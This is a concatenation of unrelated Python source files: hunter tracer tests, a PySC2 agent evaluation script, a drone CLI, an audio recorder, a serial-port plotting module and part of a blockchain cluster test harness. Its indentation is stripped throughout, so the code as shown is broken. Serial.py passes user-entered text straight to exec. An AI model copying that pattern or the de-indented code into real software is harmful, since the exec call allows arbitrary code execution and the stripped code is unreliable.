return Tracer
def _bulky_func_that_use_stdlib():
import difflib
a = list(map(str, range(500)))
b = list(map(str, range(0, 500, 2)))
list(difflib.unified_diff(a, b, 'a', 'b'))
def test_perf_filter(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
Q(module='does-not-exist') | Q(module='does not exist'.split()),
action=CodePrinter(stream=output)
)):
_bulky_func_that_use_stdlib()
return output
assert run.getvalue() == ''
def test_perf_stdlib(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
~Q(module_contains='pytest'),
~Q(module_contains='hunter'),
~Q(filename='<string>'),
~Q(filename=''),
stdlib=False,
action=CodePrinter(stream=output)
)):
_bulky_func_that_use_stdlib()
return output
assert run.getvalue() == ''
def test_perf_actions(tracer_impl, benchmark):
t = tracer_impl()
@benchmark
def run():
output = StringIO()
with t.trace(Q(
~Q(module_in=['re', 'sre', 'sre_parse']) & ~Q(module_startswith='namedtuple') & Q(kind='call'),
actions=[
CodePrinter(
stream=output
),
VarsPrinter(
'line',
stream=output
)
]
)):
_bulky_func_that_use_stdlib()
def test_clear_env_var(monkeypatch):
monkeypatch.setitem(os.environ, 'PYTHONHUNTER', '123')
assert os.environ.get('PYTHONHUNTER') == '123'
out = StringIO()
with trace(action=CallPrinter(stream=out), clear_env_var=True):
assert 'PYTHONHUNTER' not in os.environ
assert os.environ.get('PYTHONHUNTER') == None
@pytest.mark.skipif(sys.platform == 'win32', reason='no fork on windows')
@pytest.mark.parametrize('Action', [CodePrinter, CallPrinter])
@pytest.mark.parametrize('force_pid', [True, False])
def test_pid_prefix(LineMatcher, Action, force_pid, capfd):
def main():
a = 1
pid = os.fork()
if pid:
os.waitpid(pid, 0)
else:
os._exit(0) # child
with hunter.trace(actions=[Action(force_pid=force_pid, stream=sys.stdout),
VarsPrinter('a', force_pid=force_pid, stream=sys.stdout)],
stdlib=False,
threading_support=True):
main()
out, err = capfd.readouterr()
print('OUT', out)
print('ERR', err)
lm = LineMatcher(out.splitlines())
prefix = '[[]*[]] *' if force_pid else ''
lm.fnmatch_lines_random([
prefix + "MainThread *test_hunter.py:* line * a = 1",
prefix + "MainThread *test_hunter.py:* line * if pid:",
prefix + "MainThread *test_hunter.py:* line * [[]a => 1[]]",
prefix + "MainThread *test_hunter.py:* line * os.waitpid(pid, 0)",
"[[]*[]] *MainThread *test_hunter.py:* line * os._exit(0) # child",
"[[]*[]] *MainThread *test_hunter.py:* line * [[]a => 1[]]",
])
@pytest.mark.parametrize('depth', [2, 3, 4], ids='depth_lt={}'.format)
def test_depth_limit(LineMatcher, tracer_impl, depth):
buff = StringIO()
from sample7 import one
tracer = hunter.Tracer()
predicate = When(Q(depth_lt=depth), CallPrinter(stream=buff))
try:
tracer.trace(predicate)
one()
finally:
tracer.stop()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => one()",
"* line for i in range(1): # one",
"* line two()",
"* call => two()",
"* return <= two: None",
"* line for i in range(1): # one",
"* return <= one: None",
])
if depth < 3:
assert 'three' not in output
if depth < 4:
assert 'four' not in output
if depth < 5:
assert 'five' not in output
@pytest.mark.parametrize('depth', [2, 3, 4], ids='depth_lt={}'.format)
def test_depth_limit_integration(LineMatcher, depth):
hunter_env = "action=CallPrinter,depth_lt={!r},kind_in=['call','return'],stdlib=0".format(depth + 1)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample7.py')],
env=dict(os.environ, PYTHONHUNTER=hunter_env, COV_CORE_DATAFILE=''),
stderr=subprocess.STDOUT,
)
output = output.decode('utf8')
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call * => one()",
"* call * => two()",
"* return * <= two: None",
"* return * <= one: None",
])
if depth < 3:
assert '=> three' not in output
if depth < 4:
assert '=> four' not in output
if depth < 5:
assert '=> five' not in output
def test_from_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(function='five'), CallPrinter(stream=buff))):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => five()",
"* line for i in range(1): # five",
"* line return i",
"* return <= five: 0",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_line(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(fullsource_has='in_five'), CallPrinter(stream=buff), watermark=-1)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* line * for i in range(1): # five",
"* line * return i",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_no_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(function='five')), action=CallPrinter(stream=buff)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* call => five()",
"* line for i in range(1): # five",
"* line return i",
"* return <= five: 0",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
def test_from_predicate_line_no_predicate(LineMatcher):
buff = StringIO()
from sample7 import one
with trace(From(Q(fullsource_has='in_five'), watermark=-1), action=CallPrinter(stream=buff)):
one()
output = buff.getvalue()
lm = LineMatcher(output.splitlines())
lm.fnmatch_lines([
"* line * for i in range(1): # five",
"* line * return i",
])
assert 'four' not in output
assert 'three' not in output
assert 'two' not in output
assert 'one' not in output
|
local_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "-1"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import terran_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network import MiniNetwork
from strategy.terran_agent import DummyTerran
from mapping_env import SimulatePlatform
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", False, "Whether to train agents.")
flags.DEFINE_bool("on_server", False, "Whether is running on server.")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# AbyssalReef
# Simple64
# Simple96
# Flat64
# Flat32
flags.DEFINE_string("map", "AbyssalReef", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "T", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "A", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20190222-125322_source/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
# flags.DEFINE_string("restore_mini_path", "./model/20190221-213138_source/", "path for restore mini")
# flags.DEFINE_bool("restore_mini", True, "Whether to restore old model")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 1, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 24370, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 1, "the rl agent max run iters")
flags.DEFINE_integer("game_num", 100, "How many games to evaluate.")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_string("log_file", "./result/19-02-21_TvT_Simple64_log.txt", "log file to save data")
# nohup python main.py > result.out &
# kill -9 `ps -ef |grep liuruoze | grep Main_Thread | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep main.py | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# ps -ef | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
# ps -ef |grep pangzhj | grep 'main.py'
# ps -ef | grep liuruoze | grep -v sshd
# export -n http_proxy
# export -n https_proxy
# kill -9 `ps -ef |grep liuruoze | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep test_prototype.py | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# fuser -v /dev/nvidia*
# python -m pysc2.bin.play --map Simple64 --agent2 pysc2.agents.random_agent.RandomAgent
# python -m pysc2.bin.agent --map Simple64 --agent pysc2.agents.base_agent.BaseAgent --agent2 Bot
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.rally_pos = play_map.rally_pos
C.attack_pos_queue = play_map.attack_pos_queue
C.base_camera_pos = play_map.base_camera_pos
DIFF = 1
if not FLAGS.on_server:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 5
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
# DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
FLAGS(sys.argv)
THREAD_NUM = PARALLEL
# define some global variable
LOCK = threading.Lock()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
COUNTER = 0
WAITING_COUNTER = 0
#Difficulty_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 'A']
# Difficulty_list = [1, 2, 3, 4, 5, 6, 7]
Difficulty_list = [7]
Reward_list = [1, 0, -1]
RESULT_ARRAY = np.zeros((len(Difficulty_list), len(Reward_list)))
GAME_NUM = FLAGS.game_num
PER_GAME_NUM = GAME_NUM // PARALLEL
def run_thread(agent, Synchronizer):
global COUNTER, WAITING_COUNTER, GAME_NUM, PER_GAME_NUM
C._FPS = 2.8
step_mul = FLAGS.step_mul
for difficulty in Difficulty_list:
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False, game_steps_per_episode=900 * 22.4) as env:
# Only for a single player!
agent.set_env(env)
if difficulty == "A":
C.difficulty = 10
else:
C.difficulty = difficulty
for j in range(PER_GAME_NUM):
agent.play()
reward = agent.result['reward']
with LOCK:
RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(reward)] += 1
COUNTER += 1
print("difficulty %s: finished %d games!" % (difficulty, COUNTER))
agent.reset()
time.sleep(2)
if ROLLING_EVENT.is_set():
ROLLING_EVENT.clear()
WAITING_COUNTER += 1
if WAITING_COUNTER == PARALLEL:
UPDATE_EVENT.set()
if agent.index == 0:
UPDATE_EVENT.wait()
# assert RESULT_ARRAY[Difficulty_list.index(difficulty)].sum() == FLAGS.game_num
# assert WAITING_COUNTER == PARALLEL
# assert COUNTER == GAME_NUM
win = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(1)]
fair = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(0)]
lose = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(-1)]
log_file = open(FLAGS.log_file, "a")
log_file.write('difficulty: %s, game_num: %d\n' % (difficulty, GAME_NUM))
log_file.write('win: %d, %.2f\n' % (int(win), win / GAME_NUM))
log_file.write('fair: %d, %.2f\n' % (int(fair), fair / GAME_NUM))
log_file.write('loss: %d, %.2f\n\n' % (int(lose), lose / GAME_NUM))
log_file.close()
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
WAITING_COUNTER = 0
COUNTER = 0
ROLLING_EVENT.wait()
if agent.index == 0:
Synchronizer.wait()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = terran_source_agent.SourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], Synchronizer))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], Synchronizer)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
#Net = HierNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training)
#agent = multi_agent.MultiAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = terran_source_agent.SourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
Synchronizer.wait()
print("done!")
def _main(unused_argv):
"""Run agents"""
maps.get(FLAGS.map) # Assert the map exists.
# create distribute tf cluster
start_port = FLAGS.port_num
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(1):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if FLAGS.restore_model:
C._LOAD_MODEL_PATH = FLAGS.restore_model_path
Synchronizer = mp.Barrier(1 + 1)
# Run parallel process
procs = []
for index in range(1):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, 0, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
Parameter_Server(Synchronizer, Cluster, log_path, model_path)
for p in procs:
p.join()
if FLAGS.profile:
print(stopwatch.sw)
if __name__ == "__main__":
app.run(_main)
|
control_cli.py
|
"""
@title
@description
"""
import argparse
import threading
from auto_drone.drone.tello_drone import TelloDrone
class ControlCli:
def __init__(self, drone: TelloDrone):
self.drone = drone
self.running = False
self.option_menu = {
'exit': self.destroy,
}
# move_option_list = {f'move {direction.name}': direction.value for direction in MoveDirection}
# flip_option_list = {f'flip {direction.name}': direction.value for direction in FlipDirection}
# rotate_option_list = {f'rotate {direction.name}': direction.value for direction in RotateDirection}
# self.option_menu = dict(self.option_menu, **move_option_list)
# self.option_menu = dict(self.option_menu, **flip_option_list)
# self.option_menu = dict(self.option_menu, **rotate_option_list)
return
def display_menu(self):
print(str(self.drone))
for idx, (option_name, option_func) in enumerate(self.option_menu.items()):
print(f'{idx}: {" ".join(option_name.lower().split("_"))}')
return
def run_menu(self):
# todo add check for it drone is connected
self.running = True
user_prompt = f'Enter the index of a displayed option: '
user_option = ''
while self.running:
self.display_menu()
# todo add input validation
user_option = int(input(user_prompt))
print(user_option)
return
def destroy(self):
self.drone.cleanup()
return
def main(main_args):
"""
:param main_args:
:return:
"""
send_delay = main_args.get('send_delay', 0.1)
scan_delay = main_args.get('scan_delay', 0.1)
###################################
tello_drone = TelloDrone()
tello_drone.NETWORK_SCAN_DELAY = scan_delay
tello_drone.SEND_DELAY = send_delay
tello_drone.connect()
control_cli = ControlCli(drone=tello_drone)
###################################
print(tello_drone)
# connect call blocks until connected
connect_thread = threading.Thread(
target=tello_drone.connect(),
args=(),
daemon=True
)
connect_thread.start()
###################################
control_cli.run_menu()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('--timeout', type=float, default=1,
help='')
args = parser.parse_args()
main(vars(args))
|
audio_recorder.py
|
import tkinter as tk
import threading
import pyaudio
import wave
class App():
chunk = 1024
sample_format = pyaudio.paInt16
channels = 2
fs = 44100
frames = []
def __init__(self, master):
self.isrecording = False
self.button1 = tk.Button(main, text='Start', width=6,
command=self.startrecording)
self.button2 = tk.Button(main, text='Stop', width=6,
command=self.stoprecording)
self.button1.pack()
self.button2.pack()
def startrecording(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.sample_format,
channels=self.channels, rate=self.fs,
frames_per_buffer=self.chunk, input=True)
self.isrecording = True
self.button1['state'] = 'disable'
print('Recording')
t = threading.Thread(target=self.record)
t.start()
def stoprecording(self):
self.isrecording = False
print('Recording Completed')
self.filename = input('Name the file?')
self.filename = self.filename + ".wav"
wf = wave.open(self.filename, 'wb')
wf.setnchannels(self.channels)
wf.setsampwidth(self.p.get_sample_size(self.sample_format))
wf.setframerate(self.fs)
wf.writeframes(b''.join(self.frames))
wf.close()
main.destroy()
def record(self):
while self.isrecording:
data = self.stream.read(self.chunk)
self.frames.append(data)
main = tk.Tk()
main.title('Audio Recorder')
main.minsize(width=250, height=70)
app = App(main)
main.mainloop()
|
Serial.py
|
'''
Created on 25.10.2016
@author: simon
'''
'''
Created on 24.10.2016
@author: simon
'''
import numpy as np
from devices import *
import serial,time,parser
import serial.tools.list_ports as lscoms
from collections import deque
from threading import Thread
from gui.terminator import terminatehooks
import traceback
def parsefn(s):
#from numpy import *
try:
#print s
s=(
"""
from numpy import *
#print globals()
def func(x):
return %s
print func(1)
#end
"""%s
)
exec(s,locals().update(vars(np)))
#print "fn evals to", func(1)
except: print traceback.print_exc()
return func
class Serial(DeviceBase):
name="Serial"
def __init__(self,maxlen=0):
DeviceBase.__init__(self)
self.maxlen=maxlen
self.idx=0
self.serial=serial.Serial()
#for dev in lscoms.comports():print dev
self.fnstr="#Recalculate Values. \nx[0] \nx[1]"
self.fns=[]
self.comports=[p[0] for p in lscoms.comports()]
self.port=0
self.secected_comport=self.comports[0]
self.baud=100000
terminatehooks.append(self.disable)
def disable(self):
print "closing Ports"
self.enabled=False
self.serial.close()
def gen(self):
self.idx+=1
return (self.idx,np.sin(float(self.idx)/60)+np.random.rand(),np.random.rand())
def next(self):
if self.idx<self.maxlen or self.maxlen==0: return self.serial.readline()#self.gen()
else: raise StopIteration()
def read(self): return ','.join(map(str,self.gen()[1:]))
def __iter__(self):return self
def dialog(self,master):
from PyQt4 import QtCore, QtGui
grid=QtGui.QGridLayout()
frame=QtGui.QFrame(master)
frame.setLayout(grid)
self.baudwg=QtGui.QLineEdit(str(self.baud))
grid.addWidget(QtGui.QLabel("Baudrate"),0,0)
grid.addWidget(self.baudwg,0,1)
opts=self.comports[:5]
self.cbox=cbox=QtGui.QComboBox()
cbox.addItems(opts)
self.cbox.setCurrentIndex(self.port)
grid.addWidget(QtGui.QLabel("ComPort"),1,0)
grid.addWidget(cbox,1,1)
self.fnswdg=QtGui.QTextEdit()
self.fnswdg.setPlainText(self.fnstr)
grid.addWidget(self.fnswdg,2,0,6,2)
#frame.setMinimumHeight(300)
return frame
def ok(self,event):
print self.master.focus_get()
if not self.master.focus_get()==self.fns:
tkSimpleDialog.Dialog.ok(self.master, event)
def dialog_ok(self):
self.baud=int(self.baudwg.text())
self.port=self.cbox.currentIndex()
print self.port, self.baud
self.serial.port=self.comports[self.port]
self.serial.baudrate=self.baud
self.fnstr=str(self.fnswdg.toPlainText())
self.fns=self.parsefns(str(self.fnswdg.toPlainText()))
self._enable()
t=Thread(target=self.run).start()
pass
def run(self):
from devices import plot as gui
gui.initplot()
self.serial.rtscts=True
self.serial.dsrdtr=True
p=SerialWorker(self.serial.port,self.serial.baudrate,self.fnstr)
p.start()
#self.serial.open()
#for i in self.next().split(','): gui.pltAddLine(0)
for i in p.queue.get(): gui.pltAddLine(0)
gui.selectedlines.update(gui.lines)
datalen=len(gui.lines)
print "expecting %d vlues per line"%datalen
pbuff=deque(maxlen=50)
self.ts=time.time()
self.samples=0
#self.serial.__ini
#self.serial.flushInput()
while self.enabled:
self.samples+=1
if time.time()-self.ts>1 and self.samples>100:
srate=self.samples/(time.time()-self.ts)
self.samples=0
#print self.q.qsize()
self.ts=time.time()
gui.samplerate=srate
gui.master.statusmsgs['srate']="%d/s"%srate
#str=self.next()
try:
#i=map(float,str.split(','))
data=p.queue.get()
i=data['values']
#print i
s=data['raw']+' '+','.join(["%+05.2f"%j for j in i])
gui.addtxt(s)
if self.record: self.record.write(s)
if len(i)>datalen:
for j in i[datalen:]:
gui.pltAddLine(0)
gui.selectedlines.update(gui.lines)
datalen=len(gui.lines)
datalen=len(gui.lines)
for l in gui.lines[datalen:]:l.buffer.idx=gui.lines[0].buffer.idx
for j in xrange(datalen):
val=0
try:val=i[j]
except IndexError:i.append(0)
gui.pltAppendPoints(i)
except (IndexError,ValueError), e: print "dataerr", str,e
p.stop()
p.join()
print 'p-term'
#self.serial.close()
@classmethod
def parsefns(self,txt):
lines=txt.split('\n')
fns=[]
for l in lines:
l=l.strip()
if l and l[0]=="#": continue
elif l:
try:fns.append(parsefn(l))
except: print "Error in Fn", l
return fns
devices.append(Serial())
def parsefns(txt):
lines=txt.split('\n')
fns=[]
for l in lines:
l=l.strip()
if l and l[0]=="#": continue
elif l:
try:fns.append(parsefn(l))
except: print "Error in Fn", l
return fns
from multiprocessing import Process, Value,Queue,Event
import io
class SerialWorker(Process):
def __init__(self,port,baud,fnstr=None):
self.fnstr= fnstr
self.fns=[]
self.enabled=Value('i')
self.enabled.value=1
self.queue=Queue()
self.port=port
self.baud=baud
Process.__init__(self)
def run(self):
self.fns=parsefns(self.fnstr)
self.serial=serial.Serial()
self.serial.port=self.port
self.serial.baudrate=self.baud
#sio = io.TextIOWrapper(io.BufferedReader(self.serial))
self.serial.open()
self.mode=''
print "starting serial reading"
while self.enabled.value:
s0=self.serial.readline().replace('\r','')
#s0=sio.readline()
if s0[0]=='b':
self.mode=s0
s0=s0[1:]
try:#print s0
s=s0.split(',')
try:
vals=[]#map(float,s)
for v in s:
try : vals.append(float(v))
except: pass
# if len(self.fns)<len(vals):
# for i in range(len(self.fns),len(vals)):
# self.fns.append(lambda x: x[i])
newvals=[]
i=0
for fn in self.fns:
try: vals.append(fn(vals))
except IndexError: pass
i+=1
except ValueError:vals=[]
data={'values':vals,'raw':repr(self.mode+'-'+s0)}
self.queue.put(data)
except: pass
self.serial.close()
def stop(self):
self.enabled.value=0
|
cluster.py
|
import base64
import configparser
import datetime
import enum
import hashlib
import json
import os
import re
import socket
import subprocess
import sys
import tempfile
import threading
import time
import uuid
from pathlib import Path
from typing import List
import bech32
import docker
import durations
import jsonmerge
import multitail2
import tomlkit
import yaml
from dateutil.parser import isoparse
from supervisor import xmlrpc
from supervisor.compat import xmlrpclib
from . import ports
from .utils import build_cli_args_safe, format_doc_string, interact, write_ini
CHAIN = "" # edit by nix-build
if not CHAIN:
CHAIN = os.environ.get("CHAIN_MAIND", "chain-maind")
ZEMU_HOST = "127.0.0.1"
ZEMU_BUTTON_PORT = 9997
ZEMU_GRPC_SERVER_PORT = 3002
# dockerfile is integration_test/hardware_wallet/Dockerfile
ZEMU_IMAGE = "cryptocom/builder-zemu:latest"
IMAGE = "docker.pkg.github.com/crypto-com/chain-main/chain-main-pystarport:latest"
COMMON_PROG_OPTIONS = {
# redirect to supervisord's stdout, easier to collect all logs
"autostart": "true",
"autorestart": "true",
"redirect_stderr": "true",
"startsecs": "3",
}
SUPERVISOR_CONFIG_FILE = "tasks.ini"
class ModuleAccount(enum.Enum):
FeeCollector = "fee_collector"
Mint = "mint"
Gov = "gov"
Distribution = "distribution"
BondedPool = "bonded_tokens_pool"
NotBondedPool = "not_bonded_tokens_pool"
IBCTransfer = "transfer"
def home_dir(data_dir, i):
return data_dir / f"node{i}"
class Ledger:
def __init__(self):
self.ledger_name = f"ledger_simulator_{uuid.uuid4().time_mid}"
self.proxy_name = f"ledger_proxy_{uuid.uuid4().time_mid}"
self.grpc_name = f"ledger_grpc_server_{uuid.uuid4().time_mid}"
self.cmds = {
self.ledger_name: [
"./speculos/speculos.py",
"--display=headless",
f"--button-port={ZEMU_BUTTON_PORT}",
"./speculos/apps/crypto.elf",
],
self.proxy_name: ["./speculos/tools/ledger-live-http-proxy.py", "-v"],
self.grpc_name: ["bash", "-c", "RUST_LOG=debug zemu-grpc-server"],
}
self.client = docker.from_env()
self.client.images.pull(ZEMU_IMAGE)
self.containers = []
def start(self):
host_config_ledger = self.client.api.create_host_config(
auto_remove=True,
port_bindings={
ZEMU_BUTTON_PORT: ZEMU_BUTTON_PORT,
ZEMU_GRPC_SERVER_PORT: ZEMU_GRPC_SERVER_PORT,
},
)
container_ledger = self.client.api.create_container(
ZEMU_IMAGE,
self.cmds[self.ledger_name],
name=self.ledger_name,
ports=[ZEMU_BUTTON_PORT, ZEMU_GRPC_SERVER_PORT],
host_config=host_config_ledger,
)
self.client.api.start(container_ledger["Id"])
self.containers.append(container_ledger)
for name in [self.proxy_name, self.grpc_name]:
cmd = self.cmds[name]
try:
host_config = self.client.api.create_host_config(
auto_remove=True, network_mode=f"container:{self.ledger_name}"
)
container = self.client.api.create_container(
ZEMU_IMAGE,
cmd,
name=name,
host_config=host_config,
)
self.client.api.start(container["Id"])
self.containers.append(container)
time.sleep(2)
except Exception as e:
print(e)
def stop(self):
for container in self.containers:
try:
self.client.api.remove_container(container["Id"], force=True)
print("stop docker {}".format(container["Name"]))
except Exception as e:
print(e)
class LedgerButton:
def __init__(self, zemu_address, zemu_button_port):
self._client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.zemu_address = zemu_address
self.zemu_button_port = zemu_button_port
self.connected = False
@property
def client(self):
if not self.connected:
time.sleep(5)
self._client.connect((self.zemu_address, self.zemu_button_port))
self.connected = True
return self._client
def press_left(self):
data = "Ll"
self.client.send(data.encode())
def press_right(self):
data = "Rr"
self.client.send(data.encode())
def press_both(self):
data = "LRlr"
self.client.send(data.encode())
class ChainCommand:
def __init__(self, cmd=None):
self.cmd = cmd or CHAIN
def __call__(self, cmd, *args, stdin=None, **kwargs):
"execute chain-maind"
args = " ".join(build_cli_args_safe(cmd, *args, **kwargs))
return interact(f"{self.cmd} {args}", input=stdin)
class ClusterCLI:
"the apis to interact with wallet and blockchain prepared with Cluster"
def __init__(
self,
data,
chain_id,
cmd=None,
zemu_address=ZEMU_HOST,
zemu_button_port=ZEMU_BUTTON_PORT,
):
self.data_root = data
self.chain_id = chain_id
self.data_dir = data / chain_id
self.config = json.load((self.data_dir / "config.json").open())
self.raw = ChainCommand(cmd)
self._supervisorctl = None
self.leger_button = LedgerButton(zemu_address, zemu_button_port)
self.output = None
self.error = None
@property
def supervisor(self):
"http://supervisord.org/api.html"
# copy from:
# https://github.com/Supervisor/supervisor/blob/76df237032f7d9fbe80a0adce3829c8b916d5b58/supervisor/options.py#L1718
if self._supervisorctl is None:
self._supervisorctl = xmlrpclib.ServerProxy(
# dumbass ServerProxy won't allow us to pass in a non-HTTP url,
# so we fake the url we pass into it and
# always use the transport's
# 'serverurl' to figure out what to attach to
"http://127.0.0.1",
transport=xmlrpc.SupervisorTransport(
serverurl=f"unix://{self.data_root}/supervisor.sock"
),
)
return self._supervisorctl.supervisor
def reload_supervisor(self):
subprocess.run(
[
sys.executable,
"-msupervisor.supervisorctl",
"-c",
self.data_root / SUPERVISOR_CONFIG_FILE,
"update",
],
check=True,
)
def nodes_len(self):
"find how many 'node{i}' sub-directories"
return len(
[p for p in self.data_dir.iterdir() if re.match(r"^node\d+$", p.name)]
)
def create_node(
self, base_port=None, moniker=None, hostname="localhost", statesync=False
):
"""create new node in the data directory,
process information is written into supervisor config
start it manually with supervisor commands
:return: new node index and config
"""
